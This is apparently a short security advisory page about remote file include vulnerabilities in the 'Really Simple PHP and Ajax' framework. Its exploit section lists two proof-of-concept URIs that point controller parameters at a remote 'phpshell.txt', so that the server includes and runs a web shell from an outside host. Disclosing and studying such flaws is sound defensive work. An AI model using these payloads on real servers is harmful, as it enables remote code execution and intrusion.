Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://example2/phpshell.txt/?
http://www.example.com/rspa/framework/Controller_v4.php?__ClassPath=http://example2/phpshell.txt/?